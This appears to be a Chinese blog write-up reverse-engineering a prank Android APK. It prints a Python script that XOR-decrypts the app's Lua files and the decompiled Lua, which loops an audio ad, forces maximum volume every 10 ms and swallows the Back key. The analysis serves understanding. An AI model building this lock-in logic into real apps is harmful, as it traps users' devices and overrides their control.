  • 对流氓APP——一份礼物.apk的逆向分析

    1. 拿到apk ,第一步肯定先放到虚拟机里跑一下看下效果,emmm这似曾相识的页面,这熟悉的音量,唯一变化的就是音乐变成了O泡果奶的魔性洗脑广告,懂了,不就是 "送给最好的ta.apk" 吗?

    2. 使用Android killer或apk改之理分析一下,这里使用Android Killer:

    3. 通过对比送给最好的ta.apk发现:多了一个layout.lua文件 不过从名字上看这就是个布局文件,影响不大,再就是mp3文件名字从原来的0.mp3改为了mc.mp3,其他的都没变 甚至软件图标都没变.

    4. 剩下的就简单了,虽然lua文件是加密过的,但是盲猜加密方式也没变,因此白嫖pcat大佬的解密脚本:

      from ctypes import *
      import sys
      
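      def decrypt(filename):
          """Strip the XOR layer from an encrypted Lua chunk and write ``out.lua``.

          The input is treated as encrypted only when it starts with the Lua
          bytecode escape byte 0x1b and the second byte is NOT 'L' (0x4c), i.e.
          it is not already a plain "\\x1bLua" header.  Every byte after the
          first is XORed with a key derived from its position and the file
          size; the masking below reproduces the 64-bit / 32-bit overflow the
          original ctypes version relied on, without depending on ctypes.

          Args:
              filename: path of the (possibly encrypted) chunk.

          Returns:
              'out.lua' (the path written, in the current directory) when the
              file was decrypted, or None when the input does not look
              encrypted -- nothing is written in that case, and files shorter
              than two bytes are treated the same way instead of raising.
          """
          outfile = 'out.lua'
          # bytearray indexing yields ints on both Python 2 and 3.
          with open(filename, 'rb') as fh:
              data = bytearray(fh.read())
          if len(data) < 2 or data[0] != 0x1b or data[1] == 0x4c:
              # Not an encrypted chunk: deliberately a no-op, as before.
              return None
          size = len(data)
          out = bytearray(b'\x1b')
          v10 = 0
          for i in range(1, size):
              v10 += size
              # Unsigned 64-bit wrap of (-0x7F7F7F7F * v10), high 32 bits, plus v10.
              v = (((-2139062143 * v10) & 0xFFFFFFFFFFFFFFFF) >> 32) + v10
              low32 = v & 0xFFFFFFFF
              v1 = low32 >> 7
              # Sign bit of the 32-bit truncation (the old `c_int(v).value < 0`).
              v2 = 1 if low32 & 0x80000000 else 0
              out.append(data[i] ^ ((v10 + v1 + v2) & 0xff))
          with open(outfile, 'wb') as f:
              f.write(bytes(out))
          return outfile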
      
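      def foo():
          """Command-line entry point.

          Prints the argument count, then decrypts the file named by
          ``sys.argv[1]`` (defaulting to ``main.lua`` when no argument is
          given) via :func:`decrypt`.  The print statement of the original
          was Python 2 only; the call form works on both 2 and 3.
          """
          print(len(sys.argv))
          if len(sys.argv) == 2:
              filename = sys.argv[1]
          else:
              filename = 'main.lua'
          decrypt(filename)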
      
      # Script entry guard: only run when executed directly, not when imported.
      if __name__ == '__main__':
          foo()
      
      
    5. 将得到的文件使用unluac.jar进行还原,最终得到三个lua文件分别为:

      init.lua:

      -- init.lua (decompiled): application manifest values, published as
      -- globals for the host runtime to read.
      appname = "2301431462281871829.0"
      appver = "9.0"
      packagename = "com.ta.cnm"
      appcode = "9"
      appsdk = "15"
      theme = "Theme_DeviceDefault_Light_NoActionBar"
      -- The only permission the app declares.
      user_permission = { "WRITE_EXTERNAL_STORAGE" }
      

      main.lua:

      -- main.lua (decompiled; register names L0..L3 are decompiler output).
      -- Flow, for analysis: import Android classes -> force the music stream
      -- to volume 15 and hide the navigation bar -> loop mc.mp3 -> a 10 ms
      -- Ticker re-applies volume/UI flags -> onKeyDown swallows key events.
      local L0, L1, L2, L3
      -- AndroLua-style class imports (the `import` helper itself is require'd first).
      L0 = require
      L1 = "import"
      L0(L1)
      L0 = import
      L1 = "android.app.*"
      L0(L1)
      L0 = import
      L1 = "android.os.*"
      L0(L1)
      L0 = import
      L1 = "android.widget.*"
      L0(L1)
      L0 = import
      L1 = "android.view.*"
      L0(L1)
      L0 = import
      L1 = "android.view.View"
      L0(L1)
      L0 = import
      L1 = "android.content.Context"
      L0(L1)
      L0 = import
      L1 = "android.media.MediaPlayer"
      L0(L1)
      L0 = import
      L1 = "android.media.AudioManager"
      L0(L1)
      L0 = import
      L1 = "com.androlua.Ticker"
      L0(L1)
      -- activity.getSystemService(Context.AUDIO_SERVICE)
      --   .setStreamVolume(AudioManager.STREAM_MUSIC, 15, AudioManager.FLAG_SHOW_UI)
      L0 = activity
      L0 = L0.getSystemService
      L1 = Context
      L1 = L1.AUDIO_SERVICE
      L0 = L0(L1)
      L0 = L0.setStreamVolume
      L1 = AudioManager
      L1 = L1.STREAM_MUSIC
      L2 = 15
      L3 = AudioManager
      L3 = L3.FLAG_SHOW_UI
      L0(L1, L2, L3)
      -- activity.getDecorView():setSystemUiVisibility(HIDE_NAVIGATION | IMMERSIVE)
      -- (`|` is the Lua 5.3+ bitwise-or operator).
      L0 = activity
      L0 = L0.getDecorView
      L0 = L0()
      L0 = L0.setSystemUiVisibility
      L1 = View
      L1 = L1.SYSTEM_UI_FLAG_HIDE_NAVIGATION
      L2 = View
      L2 = L2.SYSTEM_UI_FLAG_IMMERSIVE
      L1 = L1 | L2
      L0(L1)
      -- Global `m`: a MediaPlayer fed <luaDir>/mc.mp3, started, and set to loop.
      L0 = MediaPlayer
      L0 = L0()
      m = L0
      L0 = m
      L0 = L0.reset
      L0()
      L0 = m
      L0 = L0.setDataSource
      L1 = activity
      L1 = L1.getLuaDir
      L1 = L1()
      L2 = "/mc.mp3"
      L1 = L1 .. L2
      L0(L1)
      L0 = m
      L0 = L0.prepare
      L0()
      L0 = m
      L0 = L0.start
      L0()
      L0 = m
      L0 = L0.setLooping
      L1 = true
      L0(L1)
      -- Global `ti`: a Ticker with Period = 10 whose onTick repeats the two
      -- calls above, so any manual volume/UI change is undone on every tick.
      -- NOTE(review): Period units are not visible here; presumably milliseconds.
      L0 = Ticker
      L0 = L0()
      ti = L0
      L0 = ti
      L0.Period = 10
      L0 = ti
      -- onTick handler (same volume + system-UI sequence as at startup).
      function L1()
        local L0, L1, L2, L3
        L0 = activity
        L0 = L0.getSystemService
        L1 = Context
        L1 = L1.AUDIO_SERVICE
        L0 = L0(L1)
        L0 = L0.setStreamVolume
        L1 = AudioManager
        L1 = L1.STREAM_MUSIC
        L2 = 15
        L3 = AudioManager
        L3 = L3.FLAG_SHOW_UI
        L0(L1, L2, L3)
        L0 = activity
        L0 = L0.getDecorView
        L0 = L0()
        L0 = L0.setSystemUiVisibility
        L1 = View
        L1 = L1.SYSTEM_UI_FLAG_HIDE_NAVIGATION
        L2 = View
        L2 = L2.SYSTEM_UI_FLAG_IMMERSIVE
        L1 = L1 | L2
        L0(L1)
      end
      L0.onTick = L1
      L0 = ti
      L0 = L0.start
      L0()
      -- Global `onKeyDown(A0, A1)`: if tostring(A1) contains "KEYCODE_BACK"
      -- the volume is forced to 15 again; it returns true for EVERY key, which
      -- presumably tells the host the event was consumed (so Back never
      -- leaves the activity) -- confirm against the AndroLua key-event contract.
      function L0(A0, A1)
        local L2, L3, L4, L5
        L2 = string
        L2 = L2.find
        L3 = tostring
        L4 = A1
        L3 = L3(L4)
        L4 = "KEYCODE_BACK"
        L2 = L2(L3, L4)
        if L2 ~= nil then
          L2 = activity
          L2 = L2.getSystemService
          L3 = Context
          L3 = L3.AUDIO_SERVICE
          L2 = L2(L3)
          L2 = L2.setStreamVolume
          L3 = AudioManager
          L3 = L3.STREAM_MUSIC
          L4 = 15
          L5 = AudioManager
          L5 = L5.FLAG_SHOW_UI
          L2(L3, L4, L5)
        end
        L2 = true
        return L2
      end
      onKeyDown = L0
      

      layout.lua:

      -- layout.lua (decompiled): declarative layout table. Element 1 of a node
      -- is the view class, named fields are its attributes, later array
      -- elements are child nodes.
      local button = {
        Button,
        textColor = "#D50000",
        -- NOTE(review): this label appears as runs of decimal byte values
        -- (possibly an extraction artifact); it is kept byte-for-byte.
        text = "230131138228184141230131138229150156 230132143228184141230132143229164150",
        layout_height = "match_parent",
        layout_width = "match_parent",
        background = "#88888888",
      }
      return {
        LinearLayout,
        button,
        layout_width = "fill",
        layout_height = "fill",
      }
      
      
    6. 分析这三个文件:

      init.lua: 定义了app的名字,版本(已经是9.0了吗),包名(有点暴躁啊这位老哥),sdk版本,使用的主题,需要的权限等数据

      main.lua:具体逻辑都在这里面:读取mc.mp3并循环播放,通过定时器不断把音量调整到15(最大),并在onKeyDown中拦截返回按钮.

      layout.lua:设置页面布局

    7. 分析完毕.解决

    你做的每件事都值得。 ——yaerda